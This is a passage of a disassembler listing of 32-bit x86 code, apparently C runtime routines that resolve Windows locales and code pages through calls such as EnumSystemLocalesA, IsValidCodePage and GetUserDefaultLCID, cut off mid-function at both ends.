var_24 = dword ptr -24h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+arg_4]
lea ecx, [ecx+0]
loc_434E84: ; CODE XREF: sub_434E70+1F�j
mov al, [edx]
or al, al
jz short loc_434E91
inc edx
bts [esp+24h+var_24], eax
jmp short loc_434E84
; ---------------------------------------------------------------------------
loc_434E91: ; CODE XREF: sub_434E70+18�j
mov esi, [ebp+arg_0]
loc_434E94: ; CODE XREF: sub_434E70+2F�j
mov al, [esi]
or al, al
jz short loc_434EA4
inc esi
bt [esp+24h+var_24], eax
jnb short loc_434E94
lea eax, [esi-1]
loc_434EA4: ; CODE XREF: sub_434E70+28�j
add esp, 20h
pop esi
leave
retn
sub_434E70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434EB0 proc near ; CODE XREF: sub_42E120+D3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
cmp ds:dword_4F3674, 0
jnz short loc_434EE2
call sub_435980
test eax, eax
jz short loc_434ED2
mov eax, ds:dword_4F5398
mov [ebp+var_8], eax
jmp short loc_434ED9
; ---------------------------------------------------------------------------
loc_434ED2: ; CODE XREF: sub_434EB0+16�j
mov [ebp+var_8], offset sub_4359D0
loc_434ED9: ; CODE XREF: sub_434EB0+20�j
mov ecx, [ebp+var_8]
mov ds:dword_4F3674, ecx
loc_434EE2: ; CODE XREF: sub_434EB0+D�j
cmp [ebp+arg_0], 0
jnz short loc_434EF2
call sub_4357D0
jmp loc_434FBE
; ---------------------------------------------------------------------------
loc_434EF2: ; CODE XREF: sub_434EB0+36�j
mov edx, [ebp+arg_0]
mov ds:dword_4F3664, edx
cmp ds:dword_4F3664, 0
jz short loc_434F24
mov eax, ds:dword_4F3664
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_434F24
push offset dword_4F3664
push 40h
push offset off_454B20
call sub_4350B0
add esp, 0Ch
loc_434F24: ; CODE XREF: sub_434EB0+52�j
; sub_434EB0+5E�j
mov edx, [ebp+arg_0]
add edx, 40h
mov ds:dword_4F3668, edx
cmp ds:dword_4F3668, 0
jz short loc_434F59
mov eax, ds:dword_4F3668
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_434F59
push offset dword_4F3668
push 16h
push offset off_454A68
call sub_4350B0
add esp, 0Ch
loc_434F59: ; CODE XREF: sub_434EB0+87�j
; sub_434EB0+93�j
mov ds:dword_4F366C, 0
cmp ds:dword_4F3664, 0
jz short loc_434F9D
mov edx, ds:dword_4F3664
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_434F9D
cmp ds:dword_4F3668, 0
jz short loc_434F96
mov ecx, ds:dword_4F3668
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_434F96
call sub_435140
jmp short loc_434F9B
; ---------------------------------------------------------------------------
loc_434F96: ; CODE XREF: sub_434EB0+D0�j
; sub_434EB0+DD�j
call sub_435530
loc_434F9B: ; CODE XREF: sub_434EB0+E4�j
jmp short loc_434FBE
; ---------------------------------------------------------------------------
loc_434F9D: ; CODE XREF: sub_434EB0+BA�j
; sub_434EB0+C7�j
cmp ds:dword_4F3668, 0
jz short loc_434FB9
mov eax, ds:dword_4F3668
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_434FB9
call sub_4356D0
jmp short loc_434FBE
; ---------------------------------------------------------------------------
loc_434FB9: ; CODE XREF: sub_434EB0+F4�j
; sub_434EB0+100�j
call sub_4357D0
loc_434FBE: ; CODE XREF: sub_434EB0+3D�j
; sub_434EB0:loc_434F9B�j ...
cmp ds:dword_4F366C, 0
jnz short loc_434FCE
xor eax, eax
jmp loc_4350AC
; ---------------------------------------------------------------------------
loc_434FCE: ; CODE XREF: sub_434EB0+115�j
mov edx, [ebp+arg_0]
add edx, 80h
push edx
call sub_435800
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_434FFC
mov eax, [ebp+var_4]
and eax, 0FFFFh
push eax
call ds:dword_4F52F4 ; IsValidCodePage
test eax, eax
jnz short loc_435003
loc_434FFC: ; CODE XREF: sub_434EB0+137�j
xor eax, eax
jmp loc_4350AC
; ---------------------------------------------------------------------------
loc_435003: ; CODE XREF: sub_434EB0+14A�j
push 1
mov ecx, ds:dword_4F3654
push ecx
call ds:dword_4F52F8 ; IsValidLocale
test eax, eax
jnz short loc_43501D
xor eax, eax
jmp loc_4350AC
; ---------------------------------------------------------------------------
loc_43501D: ; CODE XREF: sub_434EB0+164�j
cmp [ebp+arg_4], 0
jz short loc_435048
mov edx, [ebp+arg_4]
mov ax, word ptr ds:dword_4F3654
mov [edx], ax
mov ecx, [ebp+arg_4]
mov dx, word ptr ds:dword_4F3670
mov [ecx+2], dx
mov eax, [ebp+arg_4]
mov cx, word ptr [ebp+var_4]
mov [eax+4], cx
loc_435048: ; CODE XREF: sub_434EB0+171�j
cmp [ebp+arg_8], 0
jz short loc_4350A7
push 40h
mov edx, [ebp+arg_8]
push edx
push 1001h
mov eax, ds:dword_4F3654
push eax
call ds:dword_4F3674
test eax, eax
jnz short loc_43506D
xor eax, eax
jmp short loc_4350AC
; ---------------------------------------------------------------------------
loc_43506D: ; CODE XREF: sub_434EB0+1B7�j
push 40h
mov ecx, [ebp+arg_8]
add ecx, 40h
push ecx
push 1002h
mov edx, ds:dword_4F3670
push edx
call ds:dword_4F3674
test eax, eax
jnz short loc_435090
xor eax, eax
jmp short loc_4350AC
; ---------------------------------------------------------------------------
loc_435090: ; CODE XREF: sub_434EB0+1DA�j
push 0Ah
mov eax, [ebp+arg_8]
add eax, 80h
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_430220
add esp, 0Ch
loc_4350A7: ; CODE XREF: sub_434EB0+19C�j
mov eax, 1
loc_4350AC: ; CODE XREF: sub_434EB0+119�j
; sub_434EB0+14E�j ...
mov esp, ebp
pop ebp
retn
sub_434EB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4350B0 proc near ; CODE XREF: sub_434EB0+6C�p
; sub_434EB0+A1�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], 1
mov [ebp+var_C], 0
loc_4350C4: ; CODE XREF: sub_4350B0:loc_43512C�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jg short loc_43512E
cmp [ebp+var_8], 0
jz short loc_43512E
mov eax, [ebp+var_C]
add eax, [ebp+arg_4]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov eax, [edx+ecx*8]
push eax
mov ecx, [ebp+arg_8]
mov edx, [ecx]
push edx
call sub_420F10
add esp, 8
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_435112
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea edx, [ecx+eax*8+4]
mov eax, [ebp+arg_8]
mov [eax], edx
jmp short loc_43512C
; ---------------------------------------------------------------------------
loc_435112: ; CODE XREF: sub_4350B0+4F�j
cmp [ebp+var_8], 0
jge short loc_435123
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+arg_4], ecx
jmp short loc_43512C
; ---------------------------------------------------------------------------
loc_435123: ; CODE XREF: sub_4350B0+66�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_C], edx
loc_43512C: ; CODE XREF: sub_4350B0+60�j
; sub_4350B0+71�j
jmp short loc_4350C4
; ---------------------------------------------------------------------------
loc_43512E: ; CODE XREF: sub_4350B0+1A�j
; sub_4350B0+20�j
mov esp, ebp
pop ebp
retn
sub_4350B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435140 proc near ; CODE XREF: sub_434EB0+DF�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4F3664
push eax
call sub_41BC70
add esp, 4
xor ecx, ecx
cmp eax, 3
setz cl
mov ds:dword_4F3660, ecx
mov edx, ds:dword_4F3668
push edx
call sub_41BC70
add esp, 4
xor ecx, ecx
cmp eax, 3
setz cl
mov ds:dword_4F3658, ecx
mov ds:dword_4F3654, 0
cmp ds:dword_4F3660, 0
jz short loc_435199
mov [ebp+var_4], 2
jmp short loc_4351AB
; ---------------------------------------------------------------------------
loc_435199: ; CODE XREF: sub_435140+4E�j
mov edx, ds:dword_4F3664
push edx
call sub_435BE0
add esp, 4
mov [ebp+var_4], eax
loc_4351AB: ; CODE XREF: sub_435140+57�j
mov eax, [ebp+var_4]
mov ds:dword_4F365C, eax
push 1
push offset sub_435200
call ds:dword_4F52F0 ; EnumSystemLocalesA
mov ecx, ds:dword_4F366C
and ecx, 100h
test ecx, ecx
jz short loc_4351EC
mov edx, ds:dword_4F366C
and edx, 200h
test edx, edx
jz short loc_4351EC
mov eax, ds:dword_4F366C
and eax, 7
test eax, eax
jnz short loc_4351F6
loc_4351EC: ; CODE XREF: sub_435140+8E�j
; sub_435140+9E�j
mov ds:dword_4F366C, 0
loc_4351F6: ; CODE XREF: sub_435140+AA�j
mov esp, ebp
pop ebp
retn
sub_435140 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435200 proc near ; DATA XREF: sub_435140+75�o
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, [ebp+arg_0]
push eax
call sub_435B60
add esp, 4
mov [ebp+var_7C], eax
push 78h
lea ecx, [ebp+var_78]
push ecx
mov edx, ds:dword_4F3658
neg edx
sbb edx, edx
and edx, 0FFFFF005h
add edx, 1002h
push edx
mov eax, [ebp+var_7C]
push eax
call ds:dword_4F3674
test eax, eax
jnz short loc_435254
loc_435240: ; DATA XREF: _2:004547A4�o
; _2:off_44BE9C�o
mov ds:dword_4F366C, 0
mov eax, 1
jmp loc_43551E
; ---------------------------------------------------------------------------
loc_435254: ; CODE XREF: sub_435200+3E�j
lea ecx, [ebp+var_78]
push ecx
mov edx, ds:dword_4F3668
push edx
call sub_420F10
add esp, 8
test eax, eax
jnz loc_43538F
push 78h
lea eax, [ebp+var_78]
push eax
mov ecx, ds:dword_4F3660
neg ecx
sbb ecx, ecx
and ecx, 0FFFFF002h
add ecx, 1001h
push ecx
mov edx, [ebp+var_7C]
push edx
call ds:dword_4F3674
test eax, eax
jnz short loc_4352AE
mov ds:dword_4F366C, 0
mov eax, 1
jmp loc_43551E
; ---------------------------------------------------------------------------
loc_4352AE: ; CODE XREF: sub_435200+98�j
lea eax, [ebp+var_78]
push eax
mov ecx, ds:dword_4F3664
push ecx
call sub_420F10
add esp, 8
test eax, eax
jnz short loc_4352F0
mov edx, ds:dword_4F366C
or edx, 304h
mov ds:dword_4F366C, edx
mov eax, [ebp+var_7C]
mov ds:dword_4F3670, eax
mov ecx, ds:dword_4F3670
mov ds:dword_4F3654, ecx
jmp loc_43538F
; ---------------------------------------------------------------------------
loc_4352F0: ; CODE XREF: sub_435200+C3�j
mov edx, ds:dword_4F366C
and edx, 2
test edx, edx
jnz loc_43538F
cmp ds:dword_4F365C, 0
jz short loc_43535D
mov eax, ds:dword_4F365C
push eax
lea ecx, [ebp+var_78]
push ecx
mov edx, ds:dword_4F3664
push edx
call sub_438F10
add esp, 0Ch
test eax, eax
jnz short loc_43535D
mov eax, ds:dword_4F366C
or al, 2
mov ds:dword_4F366C, eax
mov ecx, [ebp+var_7C]
mov ds:dword_4F3670, ecx
mov edx, ds:dword_4F3664
push edx
loc_435343: ; DATA XREF: _2:00454828�o
call sub_41BC70
add esp, 4
cmp eax, ds:dword_4F365C
jnz short loc_43535B
mov eax, [ebp+var_7C]
mov ds:dword_4F3654, eax
loc_43535B: ; CODE XREF: sub_435200+151�j
jmp short loc_43538F
; ---------------------------------------------------------------------------
loc_43535D: ; CODE XREF: sub_435200+108�j
; sub_435200+125�j
mov ecx, ds:dword_4F366C
and ecx, 1
test ecx, ecx
jnz short loc_43538F
mov edx, [ebp+var_7C]
push edx
call sub_4358A0
add esp, 4
test eax, eax
jz short loc_43538F
mov eax, ds:dword_4F366C
or al, 1
mov ds:dword_4F366C, eax
mov ecx, [ebp+var_7C]
mov ds:dword_4F3670, ecx
loc_43538F: ; CODE XREF: sub_435200+69�j
; sub_435200+EB�j ...
mov edx, ds:dword_4F366C
and edx, 300h
cmp edx, 300h
jz loc_435511
push 78h
lea eax, [ebp+var_78]
push eax
mov ecx, ds:dword_4F3660
neg ecx
sbb ecx, ecx
and ecx, 0FFFFF002h
add ecx, 1001h
push ecx
mov edx, [ebp+var_7C]
push edx
call ds:dword_4F3674
test eax, eax
jnz short loc_4353E6
mov ds:dword_4F366C, 0
mov eax, 1
jmp loc_43551E
; ---------------------------------------------------------------------------
loc_4353E6: ; CODE XREF: sub_435200+1D0�j
lea eax, [ebp+var_78]
push eax
mov ecx, ds:dword_4F3664
push ecx
call sub_420F10
add esp, 8
test eax, eax
jnz loc_4354B0
mov edx, ds:dword_4F366C
or dh, 2
mov ds:dword_4F366C, edx
cmp ds:dword_4F3660, 0
jz short loc_43543A
mov eax, ds:dword_4F366C
or ah, 1
mov ds:dword_4F366C, eax
cmp ds:dword_4F3654, 0
jnz short loc_435438
mov ecx, [ebp+var_7C]
mov ds:dword_4F3654, ecx
loc_435438: ; CODE XREF: sub_435200+22D�j
jmp short loc_4354AE
; ---------------------------------------------------------------------------
loc_43543A: ; CODE XREF: sub_435200+217�j
cmp ds:dword_4F365C, 0
jz short loc_43548F
mov edx, ds:dword_4F3664
push edx
call sub_41BC70
add esp, 4
cmp eax, ds:dword_4F365C
jnz short loc_43548F
push 1
mov eax, [ebp+var_7C]
push eax
call sub_4358F0
add esp, 8
test eax, eax
jz short loc_43548D
mov ecx, ds:dword_4F366C
or ch, 1
mov ds:dword_4F366C, ecx
cmp ds:dword_4F3654, 0
jnz short loc_43548D
mov edx, [ebp+var_7C]
mov ds:dword_4F3654, edx
loc_43548D: ; CODE XREF: sub_435200+26A�j
; sub_435200+282�j
jmp short loc_4354AE
; ---------------------------------------------------------------------------
loc_43548F: ; CODE XREF: sub_435200+241�j
; sub_435200+258�j
mov eax, ds:dword_4F366C
or ah, 1
mov ds:dword_4F366C, eax
cmp ds:dword_4F3654, 0
jnz short loc_4354AE
mov ecx, [ebp+var_7C]
mov ds:dword_4F3654, ecx
loc_4354AE: ; CODE XREF: sub_435200:loc_435438�j
; sub_435200:loc_43548D�j ...
jmp short loc_435511
; ---------------------------------------------------------------------------
loc_4354B0: ; CODE XREF: sub_435200+1FB�j
cmp ds:dword_4F3660, 0
jnz short loc_435511
cmp ds:dword_4F365C, 0
jz short loc_435511
mov edx, ds:dword_4F365C
push edx
lea eax, [ebp+var_78]
push eax
mov ecx, ds:dword_4F3664
push ecx
call sub_438F10
add esp, 0Ch
test eax, eax
jnz short loc_435511
push 0
mov edx, [ebp+var_7C]
push edx
call sub_4358F0
add esp, 8
test eax, eax
jz short loc_435511
mov eax, ds:dword_4F366C
or ah, 1
mov ds:dword_4F366C, eax
cmp ds:dword_4F3654, 0
jnz short loc_435511
mov ecx, [ebp+var_7C]
mov ds:dword_4F3654, ecx
loc_435511: ; CODE XREF: sub_435200+1A1�j
; sub_435200:loc_4354AE�j ...
mov eax, ds:dword_4F366C
and eax, 4
neg eax
sbb eax, eax
inc eax
loc_43551E: ; CODE XREF: sub_435200+4F�j
; sub_435200+A9�j ...
mov esp, ebp
pop ebp
retn 4
sub_435200 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435530 proc near ; CODE XREF: sub_434EB0:loc_434F96�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4F3664
push eax
call sub_41BC70
add esp, 4
xor ecx, ecx
cmp eax, 3
setz cl
mov ds:dword_4F3660, ecx
cmp ds:dword_4F3660, 0
jz short loc_435562
mov [ebp+var_4], 2
jmp short loc_435574
; ---------------------------------------------------------------------------
loc_435562: ; CODE XREF: sub_435530+27�j
mov edx, ds:dword_4F3664
push edx
call sub_435BE0
add esp, 4
mov [ebp+var_4], eax
loc_435574: ; CODE XREF: sub_435530+30�j
mov eax, [ebp+var_4]
mov ds:dword_4F365C, eax
push 1
push offset sub_4355B0
call ds:dword_4F52F0 ; EnumSystemLocalesA
mov ecx, ds:dword_4F366C
and ecx, 4
test ecx, ecx
jnz short loc_4355A0
mov ds:dword_4F366C, 0
loc_4355A0: ; CODE XREF: sub_435530+64�j
mov esp, ebp
pop ebp
retn
sub_435530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4355B0 proc near ; DATA XREF: sub_435530+4E�o
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, [ebp+arg_0]
push eax
call sub_435B60
add esp, 4
mov [ebp+var_7C], eax
push 78h
lea ecx, [ebp+var_78]
push ecx
mov edx, ds:dword_4F3660
neg edx
sbb edx, edx
and edx, 0FFFFF002h
add edx, 1001h
push edx
mov eax, [ebp+var_7C]
push eax
call ds:dword_4F3674
test eax, eax
jnz short loc_435604
mov ds:dword_4F366C, 0
mov eax, 1
jmp loc_4356C9
; ---------------------------------------------------------------------------
loc_435604: ; CODE XREF: sub_4355B0+3E�j
lea ecx, [ebp+var_78]
push ecx
mov edx, ds:dword_4F3664
push edx
call sub_420F10
add esp, 8
test eax, eax
jnz short loc_435659
cmp ds:dword_4F3660, 0
jnz short loc_435636
push 1
mov eax, [ebp+var_7C]
push eax
call sub_4358F0
add esp, 8
test eax, eax
jz short loc_435657
loc_435636: ; CODE XREF: sub_4355B0+72�j
mov ecx, [ebp+var_7C]
mov ds:dword_4F3670, ecx
mov edx, ds:dword_4F3670
mov ds:dword_4F3654, edx
mov eax, ds:dword_4F366C
or al, 4
mov ds:dword_4F366C, eax
loc_435657: ; CODE XREF: sub_4355B0+84�j
jmp short loc_4356BC
; ---------------------------------------------------------------------------
loc_435659: ; CODE XREF: sub_4355B0+69�j
cmp ds:dword_4F3660, 0
jnz short loc_4356BC
cmp ds:dword_4F365C, 0
jz short loc_4356BC
mov ecx, ds:dword_4F365C
push ecx
lea edx, [ebp+var_78]
push edx
mov eax, ds:dword_4F3664
push eax
call sub_438F10
add esp, 0Ch
test eax, eax
jnz short loc_4356BC
push 0
mov ecx, [ebp+var_7C]
push ecx
call sub_4358F0
add esp, 8
test eax, eax
jz short loc_4356BC
mov edx, [ebp+var_7C]
mov ds:dword_4F3670, edx
mov eax, ds:dword_4F3670
mov ds:dword_4F3654, eax
mov ecx, ds:dword_4F366C
or ecx, 4
mov ds:dword_4F366C, ecx
loc_4356BC: ; CODE XREF: sub_4355B0:loc_435657�j
; sub_4355B0+B0�j ...
mov eax, ds:dword_4F366C
and eax, 4
neg eax
sbb eax, eax
inc eax
loc_4356C9: ; CODE XREF: sub_4355B0+4F�j
mov esp, ebp
pop ebp
retn 4
sub_4355B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4356D0 proc near ; CODE XREF: sub_434EB0+102�p
push ebp
mov ebp, esp
mov eax, ds:dword_4F3668
push eax
call sub_41BC70
add esp, 4
xor ecx, ecx
cmp eax, 3
setz cl
mov ds:dword_4F3658, ecx
push 1
push offset sub_435720
call ds:dword_4F52F0 ; EnumSystemLocalesA
mov edx, ds:dword_4F366C
and edx, 4
test edx, edx
jnz short loc_435713
mov ds:dword_4F366C, 0
loc_435713: ; CODE XREF: sub_4356D0+37�j
pop ebp
retn
sub_4356D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435720 proc near ; DATA XREF: sub_4356D0+21�o
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, [ebp+arg_0]
push eax
call sub_435B60
add esp, 4
mov [ebp+var_7C], eax
push 78h
lea ecx, [ebp+var_78]
push ecx
mov edx, ds:dword_4F3658
neg edx
sbb edx, edx
and edx, 0FFFFF005h
add edx, 1002h
push edx
mov eax, [ebp+var_7C]
push eax
call ds:dword_4F3674
test eax, eax
jnz short loc_435771
mov ds:dword_4F366C, 0
mov eax, 1
jmp short loc_4357C6
; ---------------------------------------------------------------------------
loc_435771: ; CODE XREF: sub_435720+3E�j
lea ecx, [ebp+var_78]
push ecx
mov edx, ds:dword_4F3668
push edx
call sub_420F10
add esp, 8
test eax, eax
jnz short loc_4357B9
mov eax, [ebp+var_7C]
push eax
call sub_4358A0
add esp, 4
test eax, eax
jz short loc_4357B9
mov ecx, [ebp+var_7C]
mov ds:dword_4F3670, ecx
mov edx, ds:dword_4F3670
mov ds:dword_4F3654, edx
mov eax, ds:dword_4F366C
or al, 4
mov ds:dword_4F366C, eax
loc_4357B9: ; CODE XREF: sub_435720+66�j
; sub_435720+76�j
mov eax, ds:dword_4F366C
and eax, 4
neg eax
sbb eax, eax
inc eax
loc_4357C6: ; CODE XREF: sub_435720+4F�j
mov esp, ebp
pop ebp
retn 4
sub_435720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4357D0 proc near ; CODE XREF: sub_434EB0+38�p
; sub_434EB0:loc_434FB9�p
push ebp
mov ebp, esp
mov eax, ds:dword_4F366C
or eax, 104h
mov ds:dword_4F366C, eax
call ds:dword_4F52EC ; GetUserDefaultLCID
mov ds:dword_4F3670, eax
mov ecx, ds:dword_4F3670
mov ds:dword_4F3654, ecx
pop ebp
retn
sub_4357D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435800 proc near ; CODE XREF: sub_434EB0+128�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
cmp [ebp+arg_0], 0
jz short loc_43582B
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_43582B
push offset off_43DECC
mov edx, [ebp+arg_0]
push edx
call sub_41F7E0
add esp, 8
test eax, eax
jnz short loc_435853
loc_43582B: ; CODE XREF: sub_435800+A�j
; sub_435800+14�j
push 8
lea eax, [ebp+var_8]
push eax
push 1004h
mov ecx, ds:dword_4F3670
push ecx
call ds:dword_4F3674
test eax, eax
jnz short loc_43584B
xor eax, eax
jmp short loc_435897
; ---------------------------------------------------------------------------
loc_43584B: ; CODE XREF: sub_435800+45�j
lea edx, [ebp+var_8]
mov [ebp+arg_0], edx
jmp short loc_43588B
; ---------------------------------------------------------------------------
loc_435853: ; CODE XREF: sub_435800+29�j
push offset off_43DEC8
mov eax, [ebp+arg_0]
push eax
call sub_41F7E0
add esp, 8
test eax, eax
jnz short loc_43588B
push 8
lea ecx, [ebp+var_8]
push ecx
push 0Bh
mov edx, ds:dword_4F3670
push edx
call ds:dword_4F3674
test eax, eax
jnz short loc_435885
xor eax, eax
jmp short loc_435897
; ---------------------------------------------------------------------------
loc_435885: ; CODE XREF: sub_435800+7F�j
lea eax, [ebp+var_8]
mov [ebp+arg_0], eax
loc_43588B: ; CODE XREF: sub_435800+51�j
; sub_435800+66�j
mov ecx, [ebp+arg_0]
push ecx
call sub_41E610
add esp, 4
loc_435897: ; CODE XREF: sub_435800+49�j
; sub_435800+83�j
mov esp, ebp
pop ebp
retn
sub_435800 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4358A0 proc near ; CODE XREF: sub_435200+16E�p
; sub_435720+6C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov ax, [ebp+arg_0]
mov word ptr [ebp+var_4], ax
mov [ebp+var_8], 0
jmp short loc_4358C0
; ---------------------------------------------------------------------------
loc_4358B7: ; CODE XREF: sub_4358A0:loc_4358E4�j
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
loc_4358C0: ; CODE XREF: sub_4358A0+15�j
cmp [ebp+var_8], 0Ah
jnb short loc_4358E6
mov edx, [ebp+var_4]
and edx, 0FFFFh
mov eax, [ebp+var_8]
xor ecx, ecx
mov cx, ds:word_454A54[eax*2]
cmp edx, ecx
jnz short loc_4358E4
xor eax, eax
jmp short loc_4358EB
; ---------------------------------------------------------------------------
loc_4358E4: ; CODE XREF: sub_4358A0+3E�j
jmp short loc_4358B7
; ---------------------------------------------------------------------------
loc_4358E6: ; CODE XREF: sub_4358A0+24�j
mov eax, 1
loc_4358EB: ; CODE XREF: sub_4358A0+42�j
mov esp, ebp
pop ebp
retn
sub_4358A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4358F0 proc near ; CODE XREF: sub_435200+260�p
; sub_435200+2E6�p ...
var_7C = byte ptr -7Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7Ch
push esi
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 3FFh
and eax, 0FFFFh
or ah, 4
and eax, 0FFFFh
mov [ebp+var_4], eax
push 78h
lea ecx, [ebp+var_7C]
push ecx
push 1
mov edx, [ebp+var_4]
push edx
call ds:dword_4F3674
test eax, eax
jnz short loc_43592E
xor eax, eax
jmp short loc_435972
; ---------------------------------------------------------------------------
loc_43592E: ; CODE XREF: sub_4358F0+38�j
lea eax, [ebp+var_7C]
push eax
call sub_435B60
add esp, 4
cmp [ebp+arg_0], eax
jz short loc_43596D
cmp [ebp+arg_4], 0
jz short loc_43596D
mov ecx, ds:dword_4F3664
push ecx
call sub_435BE0
add esp, 4
mov esi, eax
mov edx, ds:dword_4F3664
push edx
call sub_41BC70
add esp, 4
cmp esi, eax
jnz short loc_43596D
xor eax, eax
jmp short loc_435972
; ---------------------------------------------------------------------------
loc_43596D: ; CODE XREF: sub_4358F0+4D�j
; sub_4358F0+53�j ...
mov eax, 1
loc_435972: ; CODE XREF: sub_4358F0+3C�j
; sub_4358F0+7B�j
pop esi
mov esp, ebp
pop ebp
retn
sub_4358F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435980 proc near ; CODE XREF: sub_434EB0+F�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 98h
mov [ebp+var_94], 94h
lea eax, [ebp+var_94]
push eax
call ds:dword_4F539C ; GetVersionExA
test eax, eax
jz short loc_4359B9
cmp [ebp+var_84], 2
jnz short loc_4359B9
mov [ebp+var_98], 1
jmp short loc_4359C3
; ---------------------------------------------------------------------------
loc_4359B9: ; CODE XREF: sub_435980+22�j
; sub_435980+2B�j
mov [ebp+var_98], 0
loc_4359C3: ; CODE XREF: sub_435980+37�j
mov eax, [ebp+var_98]
mov esp, ebp
pop ebp
retn
sub_435980 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4359D0 proc near ; DATA XREF: sub_434EB0:loc_434ED2�o
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_10], 0
mov [ebp+var_4], 1Ah
mov [ebp+var_8], 0
loc_4359EB: ; CODE XREF: sub_4359D0:loc_435B33�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_4]
jg loc_435B38
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
imul ecx, 2Ch
mov edx, [ebp+arg_0]
cmp edx, ds:dword_4545B0[ecx]
jnz loc_435B0E
mov eax, [ebp+arg_4]
mov [ebp+var_14], eax
cmp [ebp+var_14], 0Bh
ja short loc_435A47
cmp [ebp+var_14], 0Bh
jz loc_435AB9
cmp [ebp+var_14], 1
jz short loc_435A64
cmp [ebp+var_14], 3
jz short loc_435A86
cmp [ebp+var_14], 7
jz short loc_435AA8
jmp loc_435AD8
; ---------------------------------------------------------------------------
loc_435A47: ; CODE XREF: sub_4359D0+54�j
cmp [ebp+var_14], 1001h
jz short loc_435A75
cmp [ebp+var_14], 1002h
jz short loc_435A97
cmp [ebp+var_14], 1004h
jz short loc_435ACA
jmp short loc_435AD8
; ---------------------------------------------------------------------------
loc_435A64: ; CODE XREF: sub_4359D0+64�j
mov ecx, [ebp+var_C]
imul ecx, 2Ch
add ecx, offset a040a ; "040a"
mov [ebp+var_8], ecx
jmp short loc_435AD8
; ---------------------------------------------------------------------------
loc_435A75: ; CODE XREF: sub_4359D0+7E�j
mov edx, [ebp+var_C]
imul edx, 2Ch
mov eax, ds:off_4545BC[edx]
mov [ebp+var_8], eax
jmp short loc_435AD8
